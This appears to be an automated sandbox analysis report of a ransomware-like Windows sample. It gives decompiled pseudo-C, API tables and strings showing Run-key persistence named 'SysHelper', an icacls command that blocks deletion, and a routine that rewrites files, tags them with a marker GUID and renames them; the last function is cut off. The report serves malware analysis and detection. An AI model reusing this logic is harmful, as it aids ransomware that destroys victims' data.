0x00411f43
0x00411f46
0x00411f4d
0x00000000
0x00411f36
0x00411f36
0x00411f4f
0x00411f54
0x00411f5c
0x00411f64
0x00411f71
0x00411f77
0x00411f83
0x00411f8e
0x00411f96
0x00411fce
0x00411fd0
0x00411fd7
0x00411fde
0x00411fe9
0x00411fef
0x00411ff5
0x00412000
0x00412000
0x00412003
0x00412006
0x0041200d
0x0041200f
0x0041200f
0x0041201a
0x0041201f
0x0041202d
0x00412036
0x0041204c
0x00412055
0x0041206e
0x00412076
0x004121d1
0x004121d5
0x004121da
0x004121df
0x004121df
0x004121e2
0x004121e4
0x004121ef
0x004121f6
0x004121fa
0x004121fc
0x004121ff
0x004121ff
0x00412204
0x00000000
0x004121fa
0x00412082
0x00412090
0x004120a1
0x004120aa
0x004120c0
0x004120ce
0x004120f3
0x004120fc
0x00412102
0x00412107
0x00412110
0x00412110
0x00412120
0x00412125
0x00412128
0x00412134
0x0041213e
0x00412146
0x00412158
0x00412161
0x0041216d
0x0041217b
0x004121a8
0x004121c0
0x004121ca
0x004121aa
0x004121aa
0x004121aa
0x00000000
0x004121a8
0x00411feb
0x00000000
0x00411feb
0x00411fa0
0x00411fa6
0x00411fac
0x00411fac
0x00411fb0
0x00411fb0
0x00411fb3
0x00411fb6
0x00411fbd
0x00411fbf
0x00411fbf
0x00411fc9
0x00000000
0x00411fc9
0x00411fa2
0x00000000
0x00411fa2
0x00411f34
0x00411dec
0x00411df1
0x00411df8
0x00411dfe
0x00411e03
0x00411e08
0x00411e08
0x00411e0d
0x00411e18
0x00411e1f
0x00411e23
0x00411e23
0x00411e2c
0x00411e34
0x00411e39
0x00411e39
0x00411e43
0x00411e48
0x00411e50
0x00000000
0x00411e52
0x00411e52
0x00411e57
0x00411e59
0x00411e5e
0x00411e60
0x00411e65
0x00411e65
0x00411e5e
0x00411e6e
0x00000000
0x00411e74
0x00411e74
0x00000000
0x00411e74
0x00411e6e
0x00411e50
0x00411d8f
0x00000000

APIs

RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
_memset.LIBCMT ref: 00411D3B
RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
GetProcAddress.KERNEL32(00000000,SHGetFolderPathW,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68), ref: 00411EA5
GetCommandLineW.KERNEL32 ref: 00411EB4
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
lstrcpyW.KERNEL32 ref: 00411ECE
PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
UuidCreate.RPCRT4 ref: 00411EFC
UuidToStringW.RPCRT4(?,?), ref: 00411F14
RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
PathAppendW.SHLWAPI(?,?), ref: 00411F83
CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
DeleteFileW.KERNEL32(?), ref: 00412036
CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
_memset.LIBCMT ref: 00412090
lstrcpyW.KERNEL32 ref: 004120AA
lstrcatW.KERNEL32 ref: 004120C0
lstrcatW.KERNEL32 ref: 004120CE
lstrlenW.KERNEL32(?), ref: 004120D7
RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
RegCloseKey.ADVAPI32(00000000), ref: 004120FC
_memset.LIBCMT ref: 00412120
SetLastError.KERNEL32(00000000), ref: 00412146
lstrcpyW.KERNEL32 ref: 00412158
lstrcatW.KERNEL32 ref: 0041216D

Strings

" --AutoStart, xrefs: 004120C2
Shell32.dll, xrefs: 00411E94
" --AutoStart, xrefs: 00411DD1
icacls ", xrefs: 0041214C
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00411D06, 00412064
D, xrefs: 00412128
" /deny *S-1-1-0:(OI)(CI)(DE,DC), xrefs: 0041216F
SysHelper, xrefs: 00411D5B, 004120EB
SHGetFolderPathW, xrefs: 00411E9F

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
API String ID: 2589766509-1182136429
Opcode ID: 4e4c5458700c2d91c1caac65c9a4d10db194b09c72ae55d3a0619c707741ebf1
Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
Opcode Fuzzy Hash: 4e4c5458700c2d91c1caac65c9a4d10db194b09c72ae55d3a0619c707741ebf1
Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004111C0 Relevance: 65.3, APIs: 36, Strings: 1, Instructions: 551
filestringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E004111C0(intOrPtr __ecx, WCHAR* __edx) {
				long _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				char _v29;
				long _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				long _v48;
				char _v64;
				long _v68;
				void* _v72;
				union _LARGE_INTEGER* _v80;
				union _LARGE_INTEGER _v84;
				long _v88;
				intOrPtr _v92;
				long _v96;
				char _v112;
				WCHAR* _v116;
				void* _v120;
				struct %anon52 _v132;
				intOrPtr _v136;
				long _v140;
				char _v156;
				intOrPtr _v160;
				long _v164;
				char _v180;
				intOrPtr _v184;
				char _v204;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t169;
				void* _t171;
				int _t172;
				long _t175;
				int _t176;
				void* _t179;
				void* _t180;
				void* _t185;
				void* _t186;
				void* _t190;
				long _t198;
				void* _t202;
				int _t203;
				void* _t207;
				void* _t208;
				long _t228;
				void* _t233;
				void* _t237;
				void* _t240;
				void* _t246;
				int _t276;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t286;
				void* _t293;
				WCHAR* _t295;
				signed int _t299;
				signed int _t301;
				CHAR* _t305;
				char* _t331;
				void* _t335;
				struct %anon52 _t355;
				union _LARGE_INTEGER* _t366;
				intOrPtr _t372;
				void* _t374;
				void* _t382;
				void* _t386;
				intOrPtr _t391;
				intOrPtr _t392;
				void* _t393;
				long _t399;
				void* _t400;
				union _LARGE_INTEGER* _t406;

				_push(0xffffffff);
				_push(E004CAC39);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t391;
				_t392 = _t391 - 0x100;
				_v20 = _t392;
				_t295 = __edx;
				_t372 = __ecx;
				_v116 = __edx;
				_v40 = __ecx;
				_v120 = 0;
				_v8 = 0;
				_t169 = CreateFileW(__edx, 0xc0000000, 1, 0, 3, 0x80, 0); // executed
				_t382 = _t169;
				_v72 = _t382;
				if(_t382 == 0xffffffff) {
					L50:
					 *[fs:0x0] = _v16;
					return _t169;
				} else {
					__imp__GetFileSizeEx(_t382,  &_v84);
					_t406 = _v80;
					if(_t406 > 0 || _t406 >= 0 && _v84.LowPart > 5) {
						_t171 = VirtualAlloc(0, 0x25815, 0x1000, 4); // executed
						_t374 = _t171;
						_v120 = _t374;
						__eflags = _t374;
						if(_t374 == 0) {
							L12:
							_t172 = CloseHandle(_t382);
							 *[fs:0x0] = _v16;
							return _t172;
						} else {
							E0042B420(_t374, 0, 0x25800);
							_t366 = _v80;
							_t393 = _t392 + 0xc;
							__eflags = _t366;
							if(__eflags < 0) {
								L19:
								goto L20;
							} else {
								_t355 = _v84.LowPart;
								if(__eflags > 0) {
									L10:
									_push(0);
									_v132 = _t355;
									_v132.HighPart = _t366;
									asm("sbb edx, 0x0");
									_t276 = SetFilePointerEx(_t382, _t355 - 0x26, _t366, 0); // executed
									__eflags = _t276 - 0xffffffff;
									if(_t276 != 0xffffffff) {
										_v28 = 0;
										_t278 = ReadFile(_t382, _t374, 0x26,  &_v28, 0); // executed
										__eflags = _t278;
										if(_t278 == 0) {
											goto L11;
										} else {
											_t280 = _v28;
											__eflags = _t280;
											if(_t280 == 0) {
												goto L11;
											} else {
												__eflags = _t280 - 0x26;
												if(_t280 != 0x26) {
													L20:
													_v136 = 0xf;
													_v140 = 0;
													_v156 = 0;
													_v8 = 3;
													_v88 = 0;
													_v28 = 0;
													_t175 = SetFilePointer(_t382, 0, 0, 0); // executed
													__eflags = _t175 - 0xffffffff;
													if(_t175 == 0xffffffff) {
														L28:
														_t299 = WriteFile;
														goto L29;
													} else {
														_v36 = 0;
														_t207 = ReadFile(_t382, _t374, 0x25805,  &_v36, 0); // executed
														__eflags = _t207;
														if(_t207 != 0) {
															_t208 = _v36;
															__eflags = _t208;
															if(_t208 == 0) {
																goto L28;
															} else {
																_v92 = 0xf;
																_v96 = 0;
																_v112 = 0;
																_t305 = _v40 + 0x20;
																_v8 = 4;
																_push(_t305);
																__eflags = _t208 - 5;
																if(__eflags <= 0) {
																	_v24 = E00420BE4(_t305, _t374, __eflags, lstrlenA());
																	E0042D8D0(_v24, _t305, lstrlenA(_t305));
																	_v44 = 0xf;
																	_v48 = 0;
																	_v64 = 0;
																	_v8 = 6;
																	E0040EAA0(_v24, lstrlenA(_t305), __eflags,  &_v64);
																	E00422110(_v24);
																	_t393 = _t393 + 0x18;
																	__eflags = _v44 - 0x10;
																	_t218 =  >=  ? _v64 :  &_v64;
																	E0040BBD0( &_v268,  >=  ? _v64 :  &_v64);
																	__eflags = _v44 - 0x10;
																	_t221 =  >=  ? _v64 :  &_v64;
																	E0040BD50( &_v268,  >=  ? _v64 :  &_v64);
																	E00412F70( &_v112, _v36);
																	__eflags = _v92 - 0x10;
																	_t225 =  >=  ? _v112 :  &_v112;
																	E0040C070( &_v268, _t214, _t382, _t374,  >=  ? _v112 :  &_v112, _v36);
																	_t228 = SetFilePointer(_t382, 0, 0, 0);
																	_t331 =  &_v64;
																} else {
																	_t246 = E00420BE4(_t305, _t374, __eflags, lstrlenA() + 5);
																	_v24 = _t246;
																	 *_t246 =  *_t374;
																	 *((char*)(_t246 + 4)) =  *((intOrPtr*)(_t374 + 4));
																	E0042D8D0(_v24 + 5, _t305, lstrlenA(_t305));
																	_v160 = 0xf;
																	_v164 = 0;
																	_v180 = 0;
																	_v8 = 5;
																	_t62 = lstrlenA(_t305) + 5; // 0x5, executed
																	E0040EAA0(_v24, _t62, __eflags,  &_v180); // executed
																	E00422110(_v24);
																	_t393 = _t393 + 0x18;
																	E00412D10( &_v180, E0040C5C0(_t305,  &_v64));
																	E00412D50( &_v64);
																	__eflags = _v160 - 0x10;
																	_t259 =  >=  ? _v180 :  &_v180;
																	E0040BBD0( &_v268,  >=  ? _v180 :  &_v180);
																	__eflags = _v160 - 0x10;
																	_t262 =  >=  ? _v180 :  &_v180;
																	E0040BD50( &_v268,  >=  ? _v180 :  &_v180);
																	_push(0xffffffff);
																	E00413FF0(_t305,  &_v156,  &_v180, 0);
																	E00412F70( &_v112, _v36 + 0xfffffffb); // executed
																	__eflags = _v92 - 0x10;
																	_t353 =  >=  ? _v112 :  &_v112;
																	__eflags = _v36 + 0xfffffffb;
																	_t83 = _t374 + 5; // 0x5
																	E0040C070( &_v268, _t62, _t382, _t83,  >=  ? _v112 :  &_v112, _v36 + 0xfffffffb);
																	_t228 = SetFilePointer(_t382, 5, 0, 0); // executed
																	_t331 =  &_v180;
																}
																__eflags = _t228 - 0xffffffff;
																if(_t228 != 0xffffffff) {
																	_v8 = 4;
																	E00412D50(_t331);
																	_t399 = _t393 - 0x18;
																	_v24 = 0;
																	_v88 = _t399;
																	E00412C40(_t399, _t374, _t305);
																	_t400 = _t399 - 0x18;
																	_v8 = 7;
																	E00412BF0(_t400,  &_v156);
																	_v8 = 4;
																	_t233 = E0040CBA0( &_v24, __eflags);
																	_t335 = _v24;
																	_t393 = _t400 + 0x30;
																	_v28 = _t233;
																	_v88 = _t335;
																	__eflags = _t335;
																	if(_t335 == 0) {
																		L44:
																		VirtualFree(_t374, 0, 0x8000);
																		CloseHandle(_t382);
																		E00412D50( &_v112);
																		_t237 = E00412D50( &_v156);
																		 *[fs:0x0] = _v16;
																		return _t237;
																	} else {
																		__eflags = _t233;
																		if(_t233 == 0) {
																			goto L44;
																		} else {
																			__eflags = _v92 - 0x10;
																			_t299 = WriteFile;
																			_t239 =  >=  ? _v112 :  &_v112;
																			_v132.HighPart = 0;
																			_t240 = WriteFile(_t382,  >=  ? _v112 :  &_v112, _v96,  &(_v132.HighPart), 0); // executed
																			__eflags = _t240;
																			if(_t240 == 0) {
																				goto L44;
																			} else {
																				_v8 = 3;
																				E00412D50( &_v112);
																				L29:
																				_push(0);
																				_t176 = SetFilePointerEx(_t382, _v84, _v80, 0); // executed
																				__eflags = _t176 - 0xffffffff;
																				if(_t176 == 0xffffffff) {
																					goto L22;
																				} else {
																					_t180 = _v28;
																					_v68 = 0;
																					__eflags = _t180;
																					if(_t180 == 0) {
																						L33:
																						_push(0);
																						_v29 = 0;
																						_push( &_v68);
																						_push( *((intOrPtr*)(_v40 + 0x860)));
																						E004130B0(_t393 - 0x18, _v40 + 0x850);
																						_t185 = E00412840( &_v112, _v29);
																						__eflags =  *((intOrPtr*)(_t185 + 0x14)) - 0x10;
																						if( *((intOrPtr*)(_t185 + 0x14)) >= 0x10) {
																							_t185 =  *_t185;
																						}
																						_t186 = WriteFile(_t382, _t185, ??, ??, ??); // executed
																						__eflags = _t186;
																						_t301 = _t299 & 0xffffff00 | _t186 == 0x00000000;
																						E00412D50( &_v112);
																						__eflags = _t301;
																						if(_t301 != 0) {
																							goto L22;
																						} else {
																							_t190 = WriteFile(_t382, "{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}", lstrlenA("{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}"),  &_v68, 0); // executed
																							__eflags = _t190;
																							if(_t190 == 0) {
																								goto L22;
																							} else {
																								CloseHandle(_t382);
																								_t386 = _t382 | 0xffffffff;
																								_v72 = _t386;
																								E00413100( &_v204, _t374, _v116);
																								_push(_t386);
																								_push(0);
																								_v8 = 8;
																								E004159D0(CloseHandle,  &_v204, _t374, _t386, _v40 + 0x868);
																								__eflags = _v184 - 8;
																								_t197 =  >=  ? _v204 :  &_v204;
																								_t198 = MoveFileW(_v116,  >=  ? _v204 :  &_v204); // executed
																								__eflags = _t198;
																								if(_t198 != 0) {
																									E00413210( &_v204);
																									_t169 = E00412D50( &_v156);
																									__eflags = _t374;
																									if(_t374 != 0) {
																										_t169 = VirtualFree(_t374, 0, 0x8000); // executed
																									}
																									__eflags = _t386 - 0xffffffff;
																									if(_t386 != 0xffffffff) {
																										_t169 = CloseHandle(_t386);
																									}
																									goto L50;
																								} else {
																									VirtualFree(_t374, _t198, 0x8000);
																									E00413210( &_v204);
																									_t202 = E00412D50( &_v156);
																									 *[fs:0x0] = _v16;
																									return _t202;
																								}
																							}
																						}
																					} else {
																						_t203 = WriteFile(_t382, _t180, _v88,  &_v68, 0); // executed
																						__eflags = _t203;
																						if(_t203 == 0) {
																							goto L22;
																						} else {
																							E00422110(_v28);
																							_t393 = _t393 + 4;
																							goto L33;
																						}
																					}
																				}
																			}
																		}
																	}
																} else {
																	E00412D50(_t331);
																	_v8 = 3;
																	E00412D50( &_v112);
																	goto L28;
																}
															}
														} else {
															L22:
															VirtualFree(_t374, 0, 0x8000);
															CloseHandle(_t382);
															_t179 = E00412D50( &_v156);
															 *[fs:0x0] = _v16;
															return _t179;
														}
													}
												} else {
													E00412C40( &_v64, _t374, _t374);
													_v8 = 2;
													_t282 = E00417060( &_v64, "{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}");
													__eflags = _t282;
													if(_t282 == 0) {
														E00412D50( &_v64);
														goto L20;
													} else {
														VirtualFree(_t374, 0, 0x8000);
														CloseHandle(_t382);
														_t286 = E00412D50( &_v64);
														 *[fs:0x0] = _v16;
														return _t286;
													}
												}
											}
										}
									} else {
										L11:
										VirtualFree(_t374, 0, 0x8000);
										goto L12;
									}
								} else {
									__eflags = _t355 - 0x26;
									if(_t355 <= 0x26) {
										goto L19;
									} else {
										goto L10;
									}
								}
							}
						}
					} else {
						CloseHandle(_t382);
						_v72 = 0xffffffff;
						E00413100( &_v64, _t372, _t295);
						_push(0xffffffff);
						_push(0);
						_v8 = 1;
						E004159D0(_t295,  &_v64, _t372, _t382, _t372 + 0x868);
						_t292 =  >=  ? _v64 :  &_v64;
						_t169 = MoveFileW(_t295,  >=  ? _v64 :  &_v64); // executed
						if(_v44 < 8) {
							goto L50;
						} else {
							_t293 = L00422587(_v64);
							 *[fs:0x0] = _v16;
							return _t293;
						}
					}
				}
			}

0x004111c3
0x004111c5
0x004111d0
0x004111d1
0x004111d8
0x004111e1
0x004111e4
0x004111f8
0x004111fa
0x004111fe
0x00411201
0x00411208
0x0041120f
0x00411215
0x00411217
0x0041121d
0x004118eb
0x004118f0
0x004118fb
0x00411223
0x00411228
0x0041122e
0x00411232
0x004112b1
0x004112b7
0x004112b9
0x004112bc
0x004112be
0x0041131a
0x0041131b
0x00411324
0x00411331
0x004112c0
0x004112c8
0x004112cd
0x004112d0
0x004112d3
0x004112d5
0x004113b1
0x00000000
0x004112db
0x004112db
0x004112de
0x004112e9
0x004112e9
0x004112eb
0x004112f3
0x004112f6
0x00411301
0x00411307
0x0041130a
0x00411342
0x00411349
0x0041134b
0x0041134d
0x00000000
0x0041134f
0x0041134f
0x00411352
0x00411354
0x00000000
0x00411356
0x00411356
0x00411359
0x004113b7
0x004113b7
0x004113c1
0x004113cb
0x004113d4
0x004113dc
0x004113e3
0x004113e6
0x004113ec
0x004113ef
0x004115bf
0x004115bf
0x00000000
0x004113f5
0x004113fa
0x00411409
0x0041140b
0x0041140d
0x00411440
0x00411443
0x00411445
0x00000000
0x0041144b
0x0041144b
0x00411452
0x00411459
0x00411460
0x00411463
0x00411467
0x00411468
0x0041146b
0x00411727
0x00411736
0x0041173e
0x00411745
0x0041174c
0x00411753
0x00411764
0x0041176f
0x00411774
0x0041177a
0x00411784
0x00411789
0x0041178e
0x0041179b
0x004117a0
0x004117ab
0x004117b0
0x004117ba
0x004117c6
0x004117d7
0x004117d9
0x00411471
0x0041147b
0x00411485
0x00411488
0x0041148e
0x004114a0
0x004114a8
0x004114b2
0x004114bc
0x004114c9
0x004114d8
0x004114db
0x004114e6
0x004114eb
0x004114fd
0x00411505
0x0041150a
0x0041151d
0x00411525
0x0041152a
0x0041153d
0x00411545
0x0041154a
0x0041155b
0x0041156a
0x0041156f
0x00411579
0x0041157d
0x00411582
0x0041158c
0x0041159d
0x0041159f
0x0041159f
0x004115a5
0x004115a8
0x004117e1
0x004117e5
0x004117ea
0x004117ed
0x004117f6
0x004117fa
0x004117ff
0x00411802
0x0041180f
0x00411817
0x0041181b
0x00411820
0x00411823
0x00411826
0x00411829
0x0041182c
0x0041182e
0x0041186e
0x00411876
0x0041187d
0x00411886
0x00411891
0x00411899
0x004118a6
0x00411830
0x00411830
0x00411832
0x00000000
0x00411834
0x00411834
0x0041183b
0x00411844
0x0041184e
0x00411857
0x00411859
0x0041185b
0x00000000
0x0041185d
0x00411860
0x00411864
0x004115c5
0x004115c5
0x004115d0
0x004115d6
0x004115d9
0x00000000
0x004115df
0x004115df
0x004115e2
0x004115e9
0x004115eb
0x0041160e
0x0041160e
0x00411613
0x00411617
0x0041161b
0x0041162c
0x00411637
0x0041163f
0x00411643
0x00411645
0x00411645
0x00411649
0x0041164b
0x00411650
0x00411653
0x00411658
0x0041165a
0x00000000
0x00411660
0x00411678
0x0041167e
0x00411680
0x00000000
0x00411686
0x0041168d
0x00411692
0x0041169b
0x0041169e
0x004116ac
0x004116ad
0x004116b4
0x004116b9
0x004116be
0x004116cb
0x004116d6
0x004116dc
0x004116de
0x004118ad
0x004118b8
0x004118d1
0x004118d3
0x004118dd
0x004118dd
0x004118e3
0x004118e6
0x004118e9
0x004118e9
0x00000000
0x004116e4
0x004116eb
0x004116f7
0x00411702
0x0041170a
0x00411717
0x00411717
0x004116de
0x00411680
0x004115ed
0x004115f8
0x004115fa
0x004115fc
0x00000000
0x00411602
0x00411606
0x0041160b
0x00000000
0x0041160b
0x004115fc
0x004115eb
0x004115d9
0x0041185b
0x00411832
0x004115ae
0x004115ae
0x004115b6
0x004115ba
0x00000000
0x004115ba
0x004115a8
0x0041140f
0x0041140f
0x00411417
0x0041141e
0x0041142a
0x00411432
0x0041143f
0x0041143f
0x0041140d
0x0041135b
0x0041135f
0x00411369
0x00411370
0x00411375
0x00411377
0x004113aa
0x00000000
0x00411379
0x00411381
0x00411388
0x00411391
0x00411399
0x004113a6
0x004113a6
0x00411377
0x00411359
0x00411354
0x0041130c
0x0041130c
0x00411314
0x00000000
0x00411314
0x004112e0
0x004112e0
0x004112e3
0x00000000
0x00000000
0x00000000
0x00000000
0x004112e3
0x004112de
0x004112d5
0x0041123c
0x0041123d
0x00411247
0x0041124e
0x00411253
0x00411255
0x0041125d
0x00411265
0x00411271
0x00411277
0x00411281
0x00000000
0x00411287
0x0041128a
0x00411295
0x004112a2
0x004112a2
0x00411281
0x00411232

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 0041120F
GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00411228
CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041123D
MoveFileW.KERNEL32(00000000,?), ref: 00411277
VirtualAlloc.KERNEL32(00000000,00025815,00001000,00000004,?,00000000,?), ref: 004112B1
_memset.LIBCMT ref: 004112C8
SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00411301
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00411314
CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041131B
ReadFile.KERNEL32(00000000,00000000,00000026,?,00000000,?,00000000,?), ref: 00411349
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00000000,?), ref: 00411381
CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00411388
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 004113E6
ReadFile.KERNEL32(00000000,00000000,00025805,?,00000000,?,00000000,?), ref: 00411409
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00411417
CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041141E
lstrlenA.KERNEL32(?,?,00000000,?), ref: 00411471
lstrlenA.KERNEL32(?,?,?,00000000,?), ref: 00411491
lstrlenA.KERNEL32(?,00000000,?,?,?,?,?,00000000,?), ref: 004114CF
SetFilePointer.KERNEL32(00000000,00000005,00000000,00000000,00000005,00000000,-000000FB,-000000FB,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 0041159D
SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 004115D0
WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 004115F8
WriteFile.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00411649
lstrlenA.KERNEL32({36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041166B
WriteFile.KERNEL32(00000000,{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411678
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 0041168D
MoveFileW.KERNEL32(?,?), ref: 004116D6
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004116EB

Strings

{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}, xrefs: 00411364, 00411666, 00411672

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: File$CloseHandleVirtual$FreePointerlstrlen$Write$MoveRead$AllocCreateSize_memset
String ID: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
API String ID: 254274740-1186676987
Opcode ID: 293c49c6598277702c9a6e154ae3a7bf40a384076c9d9a741040a37d38e83410
Instruction ID: 4b60432aefe4dd0e03df0e566fa74873db0e7dc4ed90acce11ed2be1fb3b5442
Opcode Fuzzy Hash: 293c49c6598277702c9a6e154ae3a7bf40a384076c9d9a741040a37d38e83410
Instruction Fuzzy Hash: E7229F70E00209EBDB10EBA5DC85FEEB7B8EF05304F10416AE519B7291DB785A85CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041DBD0 Relevance: 49.6, APIs: 23, Strings: 5, Instructions: 565
networkfilelibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E0041DBD0(void* __ecx, void* __eflags, intOrPtr _a4, void* _a12, intOrPtr _a16, char _a20, intOrPtr* _a24, void* _a32, long _a36, char* _a40, CHAR* _a44, intOrPtr _a48, void* _a56, void* _a60, void* _a64, void* _a68, void* _a72, intOrPtr _a76, void* _a80, void* _a84, intOrPtr _a88, void _a92, void* _a96, void* _a100, void _a108, intOrPtr _a124, CHAR* _a164, char _a168, char _a172, intOrPtr _a180, char _a192, char _a193, char _a200, char _a204, void* _a208, void* _a212, char _a10360, char _a10368, char _a10372, char _a10412, char _a10420, char _a10424, char _a10436, char _a10456, char _a10476, signed int _a10488, char _a10492, void* _a10496) {
				void* _v16;
				void _v28;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				long _v52;
				void* _v56;
				long _v64;
				long _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				char _v81;
				void* _v84;
				void* _v88;
				intOrPtr _v93;
				char _v96;
				char _v100;
				char _v104;
				void* _v108;
				intOrPtr _v116;
				void* _v124;
				void* _v128;
				void* _v132;
				void* _v136;
				void* _v140;
				char _v144;
				char _v148;
				void* _v152;
				char _v156;
				char _v160;
				void* _v164;
				char _v172;
				void* __ebx;
				void* __edi;
				void* __ebp;
				long _t221;
				_Unknown_base(*)()* _t227;
				intOrPtr _t233;
				void* _t243;
				void* _t248;
				void* _t251;
				void* _t256;
				char* _t260;
				void* _t261;
				void* _t267;
				void* _t271;
				char _t279;
				void* _t283;
				long _t287;
				int _t290;
				long _t297;
				int _t299;
				void* _t324;
				intOrPtr _t325;
				CHAR* _t327;
				int _t331;
				char* _t335;
				char* _t336;
				intOrPtr* _t342;
				void* _t343;
				char* _t346;
				char* _t350;
				short* _t352;
				char* _t359;
				void* _t360;
				short* _t364;
				void _t366;
				intOrPtr* _t369;
				void* _t373;
				char* _t374;
				char* _t377;
				void* _t379;
				void* _t380;
				char* _t384;
				void* _t386;
				void* _t387;
				char* _t389;
				void* _t390;
				void** _t391;
				signed int _t392;
				signed int _t393;
				char* _t394;
				char* _t395;
				void* _t396;
				char* _t398;
				char* _t400;
				void* _t401;
				short* _t402;
				void* _t403;
				short* _t404;

				_t393 = _t392 & 0xfffffff8;
				_push(0xffffffff);
				_push(E004CB3AE);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t393;
				_push(__ecx);
				E0042F7C0(0x2914);
				_push(_t324);
				_t376 = _a4;
				_push(0xffffffff);
				_a212 = 0xf;
				_a208 = 0;
				_a192 = 0;
				E00413FF0(_t324,  &_a192, _a4 + 0x8c8, 0);
				_a10496 = 0;
				_a64 = 0;
				_a68 = 0;
				_a72 = 0;
				_t394 = _t393 - 0x18;
				_a10496 = 1;
				_t335 = _t394;
				_a4 = _t394;
				_push(1);
				 *(_t335 + 0x14) = 0xf;
				 *(_t335 + 0x10) = 0;
				 *_t335 = 0;
				E004156D0(_t324, _t335, _a4, " ");
				_t395 = _t394 - 0x18;
				_a10488 = 2;
				_t336 = _t395;
				_push(0xffffffff);
				 *(_t336 + 0x14) = 0xf;
